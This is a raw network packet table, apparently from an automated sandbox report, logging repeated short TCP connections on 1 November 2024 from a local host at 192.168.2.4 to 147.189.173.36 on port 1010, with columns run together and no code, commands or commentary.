                                            Nov 1, 2024 06:23:13.853113890 CET499061010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:13.966927052 CET499141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:13.971818924 CET101049914147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:13.971893072 CET499141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:14.024493933 CET499141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:14.029337883 CET101049914147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:14.029388905 CET499141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:14.034468889 CET101049914147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:14.639271021 CET101049914147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:14.672410011 CET101049914147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:14.674988985 CET499141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:14.675659895 CET499141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:14.681329966 CET101049914147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:14.682913065 CET499141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:14.795057058 CET499201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:14.799988985 CET101049920147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:14.800096989 CET499201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:14.839215994 CET499201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:14.846064091 CET101049920147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:14.846143007 CET499201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:14.852932930 CET101049920147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:15.481065989 CET101049920147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:15.514645100 CET101049920147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:15.514705896 CET499201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:15.515516996 CET499201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:15.520641088 CET101049920147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:15.522833109 CET499201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:15.625686884 CET499251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:15.630552053 CET101049925147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:15.631043911 CET499251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:16.166943073 CET499251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:16.171869040 CET101049925147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:16.171919107 CET499251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:16.176888943 CET101049925147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:16.345629930 CET101049925147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:16.378684044 CET101049925147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:16.383001089 CET499251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:16.383693933 CET499251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:16.389029980 CET101049925147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:16.390603065 CET499251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:16.501159906 CET499311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:16.506191015 CET101049931147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:16.506259918 CET499311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:16.531254053 CET499311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:16.536192894 CET101049931147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:16.536240101 CET499311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:16.541100025 CET101049931147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:17.191891909 CET101049931147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:17.226730108 CET101049931147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:17.226835966 CET499311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:17.227601051 CET499311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:17.245234013 CET101049931147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:17.245342970 CET499311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:17.341857910 CET499361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:17.347301006 CET101049936147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:17.347388029 CET499361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:17.379533052 CET499361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:17.384418011 CET101049936147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:17.384629965 CET499361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:17.389488935 CET101049936147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:18.039186954 CET101049936147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:18.072038889 CET101049936147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:18.072156906 CET499361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:18.072900057 CET499361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:18.078424931 CET101049936147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:18.078490973 CET499361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:18.350040913 CET499431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:18.355518103 CET101049943147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:18.358935118 CET499431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:18.412504911 CET499431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:18.418255091 CET101049943147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:18.418673992 CET499431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:18.424114943 CET101049943147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:19.034296989 CET101049943147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:19.067174911 CET101049943147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:19.067240000 CET499431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:19.113025904 CET499431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:19.118585110 CET101049943147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:19.118637085 CET499431010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:19.232552052 CET499481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:19.237490892 CET101049948147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:19.237560034 CET499481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:19.272727966 CET499481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:19.278615952 CET101049948147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:19.278678894 CET499481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:19.283679008 CET101049948147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:19.920605898 CET101049948147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:19.953378916 CET101049948147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:19.953435898 CET499481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:19.954581976 CET499481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:19.960143089 CET101049948147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:19.960203886 CET499481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:20.060700893 CET499541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:20.065635920 CET101049954147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:20.065773010 CET499541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:20.085948944 CET499541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:20.091012001 CET101049954147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:20.091064930 CET499541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:20.095849991 CET101049954147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:20.749785900 CET101049954147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:20.783422947 CET101049954147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:20.784554005 CET499541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:20.785259008 CET499541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:20.790832043 CET101049954147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:20.790882111 CET499541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:20.904469013 CET499591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:20.909393072 CET101049959147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:20.909496069 CET499591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:20.942159891 CET499591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:20.947055101 CET101049959147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:20.947105885 CET499591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:20.951977015 CET101049959147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:21.590435982 CET101049959147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:21.623505116 CET101049959147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:21.624608040 CET499591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:21.634093046 CET499591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:21.639448881 CET101049959147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:21.639512062 CET499591010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:21.794967890 CET499641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:21.800014019 CET101049964147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:21.801570892 CET499641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:21.852102041 CET499641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:21.857103109 CET101049964147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:21.857233047 CET499641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:21.862122059 CET101049964147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:22.486255884 CET101049964147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:22.519412994 CET101049964147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:22.520713091 CET499641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:22.521279097 CET499641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:22.526607037 CET101049964147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:22.526737928 CET499641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:22.638705969 CET499691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:22.645092964 CET101049969147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:22.647645950 CET499691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:22.681222916 CET499691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:22.686101913 CET101049969147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:22.686688900 CET499691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:22.691639900 CET101049969147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:23.329329967 CET101049969147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:23.362720966 CET101049969147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:23.362832069 CET499691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:23.363465071 CET499691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:23.369020939 CET101049969147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:23.370364904 CET499691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:23.482518911 CET499751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:23.487611055 CET101049975147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:23.487704992 CET499751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:23.510632992 CET499751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:23.515511036 CET101049975147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:23.515569925 CET499751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:23.520370007 CET101049975147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:24.169924974 CET101049975147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:24.194027901 CET101049975147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:24.195961952 CET499751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:24.434178114 CET499751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:24.441248894 CET101049975147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:24.441312075 CET499751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:24.667989969 CET499841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:24.672772884 CET101049984147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:24.672846079 CET499841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:24.713826895 CET499841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:24.718723059 CET101049984147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:24.718795061 CET499841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:24.723817110 CET101049984147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:25.356796026 CET101049984147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:25.390407085 CET101049984147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:25.390482903 CET499841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:25.391834974 CET499841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:25.397031069 CET101049984147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:25.397108078 CET499841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:25.498348951 CET499861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:25.503184080 CET101049986147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:25.503272057 CET499861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:25.533076048 CET499861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:25.538783073 CET101049986147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:25.538855076 CET499861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:25.543948889 CET101049986147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:26.186145067 CET101049986147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:26.219193935 CET101049986147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:26.219288111 CET499861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:26.220062017 CET499861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:26.225272894 CET101049986147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:26.226695061 CET499861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:26.326396942 CET499921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:26.331191063 CET101049992147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:26.331300020 CET499921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:26.347050905 CET499921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:26.351963043 CET101049992147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:26.354779959 CET499921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:26.359652042 CET101049992147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:27.016599894 CET101049992147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:27.049535036 CET101049992147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:27.049624920 CET499921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:27.076136112 CET499921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:27.081360102 CET101049992147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:27.081417084 CET499921010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:27.677443027 CET500021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:27.682276011 CET101050002147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:27.682368040 CET500021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:27.720741034 CET500021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:27.725712061 CET101050002147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:27.725786924 CET500021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:27.730556965 CET101050002147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:28.362055063 CET101050002147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:28.395411015 CET101050002147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:28.395469904 CET500021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:28.396109104 CET500021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:28.401329994 CET101050002147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:28.401381016 CET500021010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:28.513798952 CET500081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:28.518639088 CET101050008147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:28.518759012 CET500081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:28.550308943 CET500081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:28.555097103 CET101050008147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:28.558967113 CET500081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:28.563714981 CET101050008147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:29.191309929 CET101050008147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:29.224212885 CET101050008147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:29.226821899 CET500081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:29.227441072 CET500081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:29.232794046 CET101050008147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:29.232856035 CET500081010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:29.341738939 CET500141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:29.346645117 CET101050014147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:29.350747108 CET500141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:29.382739067 CET500141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:29.387511015 CET101050014147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:29.390719891 CET500141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:29.396533012 CET101050014147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:30.004757881 CET101050014147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:30.038110971 CET101050014147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:30.038707972 CET500141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:30.070378065 CET500141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:30.075360060 CET101050014147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:30.076822042 CET500141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:30.225559950 CET500201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:30.230524063 CET101050020147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:30.230604887 CET500201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:30.442153931 CET500201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:30.448154926 CET101050020147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:30.448204041 CET500201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:30.453082085 CET101050020147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:30.915884972 CET101050020147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:30.965959072 CET500201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:31.173794031 CET101050020147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:31.174310923 CET101050020147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:31.174355984 CET500201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:31.174647093 CET500201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:31.295197010 CET500251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:31.399035931 CET101050025147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:31.399055958 CET101050020147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:31.399148941 CET500201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:31.399158955 CET500251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:31.429832935 CET500251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:31.434735060 CET101050025147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:31.434799910 CET500251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:31.439574957 CET101050025147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:32.082602978 CET101050025147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:32.114244938 CET101050025147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:32.114304066 CET500251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:32.115509987 CET500251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:32.120635033 CET101050025147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:32.120685101 CET500251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:32.232640028 CET500301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:32.237685919 CET101050030147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:32.237767935 CET500301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:32.261508942 CET500301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:32.266261101 CET101050030147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:32.266331911 CET500301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:32.271075964 CET101050030147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:32.925802946 CET101050030147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:32.958977938 CET101050030147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:32.959063053 CET500301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:32.959619045 CET500301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:32.966517925 CET101050030147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:32.966582060 CET500301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:33.076225996 CET500361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:33.081068039 CET101050036147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:33.081140995 CET500361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:33.113240004 CET500361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:33.118078947 CET101050036147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:33.118149996 CET500361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:33.122899055 CET101050036147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:33.765043020 CET101050036147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:33.797985077 CET101050036147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:33.798044920 CET500361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:33.798598051 CET500361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:33.803740978 CET101050036147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:33.804373980 CET500361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:33.904599905 CET500421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:33.909421921 CET101050042147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:33.909514904 CET500421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:33.923423052 CET500421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:33.928723097 CET101050042147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:33.930759907 CET500421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:33.935880899 CET101050042147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:34.596932888 CET101050042147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:34.630619049 CET101050042147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:34.630733967 CET500421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:34.631422043 CET500421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:34.636534929 CET101050042147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:34.636596918 CET500421010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:34.748483896 CET500481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:34.754508972 CET101050048147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:34.754729986 CET500481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:34.788635969 CET500481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:34.793406963 CET101050048147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:34.794718981 CET500481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:34.799508095 CET101050048147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:35.435554028 CET101050048147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:35.463324070 CET101050048147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:35.466825008 CET500481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:35.467629910 CET500481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:35.472732067 CET101050048147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:35.472815037 CET500481010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:35.576749086 CET500541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:35.582465887 CET101050054147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:35.582545042 CET500541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:35.623231888 CET500541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:35.628098965 CET101050054147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:35.628179073 CET500541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:35.633009911 CET101050054147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:36.296752930 CET101050054147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:36.329947948 CET101050054147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:36.330003023 CET500541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:36.330830097 CET500541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:36.335933924 CET101050054147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:36.335985899 CET500541010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:36.451127052 CET500601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:36.456018925 CET101050060147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:36.456084013 CET500601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:36.477174044 CET500601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:36.481930017 CET101050060147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:36.482959986 CET500601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:36.487915039 CET101050060147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:37.126867056 CET101050060147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:37.159961939 CET101050060147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:37.160023928 CET500601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:37.160707951 CET500601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:37.165787935 CET101050060147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:37.165838003 CET500601010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:37.279308081 CET500661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:37.284238100 CET101050066147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:37.284684896 CET500661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:37.325854063 CET500661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:37.330687046 CET101050066147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:23:37.332581043 CET500661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:23:37.337343931 CET101050066147.189.173.36192.168.2.4
